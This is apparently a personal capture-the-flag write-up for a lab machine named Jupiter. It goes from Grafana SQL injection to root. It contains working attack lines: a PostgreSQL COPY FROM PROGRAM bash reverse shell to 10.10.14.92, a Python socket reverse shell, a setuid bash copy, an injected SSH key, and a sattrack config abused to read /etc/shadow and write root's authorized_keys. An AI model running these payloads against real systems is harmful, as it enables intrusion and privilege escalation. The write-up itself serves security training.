Jupiter
Enumeration
Ports and Services
Software Installed:
- Grafana v9.5.2 (cfcea75916)
Nmap Scan Results:
DNS Subdomain:
kiosk.jupiter.htb:
Raw SQL being sent in the http request:
POST /ap/ds/query
Initial Foothold
https://medium.com/greenwolf-security/authenticated-arbitrary-command- execution-on-postgresql-9-3-latest-cd18945914d5
Remote Code Execution:
Result
Received a reverse shell as postgres
DROP TABLE IF EXISTS cmd_exec; CREATE TABLE cmd_exec(cmd_output text); COPY cmd_exec FROM PROGRAM 'bash -c \"bash -i >& /dev/tcp/10.10.14.92/8888 0>&1\"'
**
There is an odd file in /dev/shm network-simulation.yml
Contents:**
general:
# stop after 10 simulated seconds
stop_time: 10s
# old versions of cURL use a busy loop, so to avoid spinning in this busy
# loop indefinitely, we add a system call latency to advance the simulated
# time when running non-blocking system calls
model_unblocked_syscall_latency: true
network:
graph:
# use a built-in network graph containing
# a single vertex with a bandwidth of 1 Gbit
type: 1_gbit_switch
hosts:
# a host with the hostname 'server'
server:
network_node_id: 0
processes:
- path: /usr/bin/python3
args: -m http.server 80
start_time: 3s
# three hosts with hostnames 'client1', 'client2', and 'client3'
client:
network_node_id: 0
quantity: 3
processes:
- path: /usr/bin/curl
args: -s server
start_time: 5s
**File is writable to everyone:
Changed server to ping -c 1 10.10.14.92 and waited
After attempts of getting a reverse shell nothing seemed to work. Special
characters causing issues and I couldn’t call shell scripts. Ended up copying
the /bin/bash execuable to /dev/shm and giving it setuid for user juno
Result:
**
Couldn’t elevate from /dev/shm
Redid copy and suid to /tmp:
Result:
Authoirzed Keys is empty. Generated and added public key
echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCtc6fc40nPSoXwTeyMrlmeyat0uZ6ExvPVOPewiQLPh9vI4aJUS89PpRa4DoODYicgROE8ylnXC0uul2t6Jr1hFyYhokLwGu7EG7Sp+WULc76hc7S9AxN3ZVATKKyODk9w6TmJrB2L2DPPEuPkfZCiEN/XMyYNq/D+AM2M8DjChiZMrlZlsDY9Iqx49D3+cQ5am9eHh6cxP9zE2qJD0MchednlVGdqLhSlbU6BzcAMHPTwFn1aHW/0XQkGh2fc6xi5HaMUkwy+KdB47mQx5flPalNCSC9n4qs2xWURMlPezpMJ6hF/gryxv/jyKoIDdHW4ibfWUf6M9AS6heRBi7UYmNOiKMGwCspLicILbmCocXTNNKkwB2wArC7brmSUEBupIZjfek6bbPZsh3oKgEVWP05y42S/zFFyL38WO7gEppAshELyBHuCR/5zvrd2PKU174VdOS/mgvv47zUs+N1bv18fTJQkYG96C8PFP7iP4gHle9v5UFalGJVdwuwYbGU= rogue@kali' > authorized_keys
SSH as Juno
User.txt Proof Screenshot
Privilege Escalation
User jovian is running a python job:
Jovian is part of the science and sudo group:
Interesting ports:
Port 3000 is the port used by kiosk:
Group Wirtable Files - Science
Port 8888
Found token in /opt/solar-flares/logs/jupyter-2023-10-11-16.log
Created a new notebook and put in the In field
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.92",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
Result:
logged in as jovian. Jovian sudo -l
Running sattrack and it complains about not find a configuration file. Running
strings | grep conf reveals it is looking for a /tmp/config
Config located in /usr/local/share/sattrack:
Chmodded the file to 777 so juno could edit (ssh session) and modifed a tle
source to get the /etc/shadow file:
Result:
Copied Juno’s authorized keys to /tmp, edited the config.json to copy the file
to /root/.ssh
Config.json
{
"tleroot": "/root/.ssh/",
"tlefile": "weather.txt",
"mapfile": "/usr/local/share/sattrack/map.json",
"texturefile": "/usr/local/share/sattrack/earth.png",
"tlesources": [
"file:///tmp/authorized_keys"
],
"updatePerdiod": 1000,
"station": {
"name": "LORCA",
"lat": 37.6725,
"lon": -1.5863,
"hgt": 335.0
},
"show": [
],
"columns": [
"name",
"azel",
"dis",
"geo",
"tab",
"pos",
"vel"
]
}
SSH as root
RootScreenshot Here:
